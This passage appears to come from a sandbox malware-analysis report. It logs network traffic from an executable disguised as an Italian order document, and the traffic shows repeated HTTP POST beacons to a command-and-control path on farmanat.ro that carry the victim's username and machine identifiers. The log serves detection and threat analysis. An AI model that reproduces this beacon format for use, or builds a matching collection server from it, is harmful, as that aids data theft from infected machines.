Nov 25, 2021 10:55:29.358542919 CET	7514	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
873	192.168.11.20	50721	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:29.703562975 CET	7515	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:29.736932039 CET	7515	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:29.790647984 CET	7516	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
874	192.168.11.20	50722	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:30.142951012 CET	7516	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:30.177015066 CET	7517	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:30.227924109 CET	7517	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
875	192.168.11.20	50723	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:30.577953100 CET	7518	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:30.611521959 CET	7518	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:30.660511971 CET	7518	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
876	192.168.11.20	50724	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:31.094476938 CET	7519	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:31.128005981 CET	7519	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:31.186337948 CET	7520	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
877	192.168.11.20	50725	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:31.594377041 CET	7520	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:31.628566980 CET	7521	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:31.680608034 CET	7521	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
878	192.168.11.20	50726	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:32.108072042 CET	7522	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:32.142311096 CET	7522	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:32.199045897 CET	7522	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
879	192.168.11.20	50727	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:32.638412952 CET	7523	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:32.672657967 CET	7523	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:32.723047018 CET	7524	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.11.20	49925	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:55.484488964 CET	6437	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:55.518080950 CET	6437	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:55.568913937 CET	6438	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.11.20	49926	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:56.007947922 CET	6438	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:56.041470051 CET	6439	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:56.094065905 CET	6439	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49844	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:06.230046034 CET	6317	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:06.263920069 CET	6318	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:06.314524889 CET	6318	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.11.20	49927	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:56.507759094 CET	6440	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:56.541923046 CET	6440	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:56.596268892 CET	6440	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.11.20	49928	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:57.040796995 CET	6441	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:57.074956894 CET	6441	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:57.126076937 CET	6442	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.11.20	49929	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:57.544069052 CET	6442	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:57.577482939 CET	6443	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:57.626811028 CET	6443	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.11.20	49930	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:58.081847906 CET	6444	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:58.116245031 CET	6444	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:58.168596029 CET	6444	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.11.20	49931	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:58.604841948 CET	6445	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:58.639270067 CET	6445	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:58.692387104 CET	6446	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.11.20	49932	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:59.185833931 CET	6446	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:59.219633102 CET	6446	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:59.272428989 CET	6447	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.11.20	49933	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:59.754446983 CET	6448	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:59.788669109 CET	6448	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:59.838318110 CET	6448	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.11.20	49934	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:00.325952053 CET	6449	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:00.359715939 CET	6449	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:00.411487103 CET	6450	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.11.20	49935	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:00.885502100 CET	6450	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:00.919723988 CET	6451	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:00.972506046 CET	6451	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.11.20	49936	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:01.341392994 CET	6452	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:01.374974012 CET	6452	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:01.424958944 CET	6452	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49816	197.242.150.64	443	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
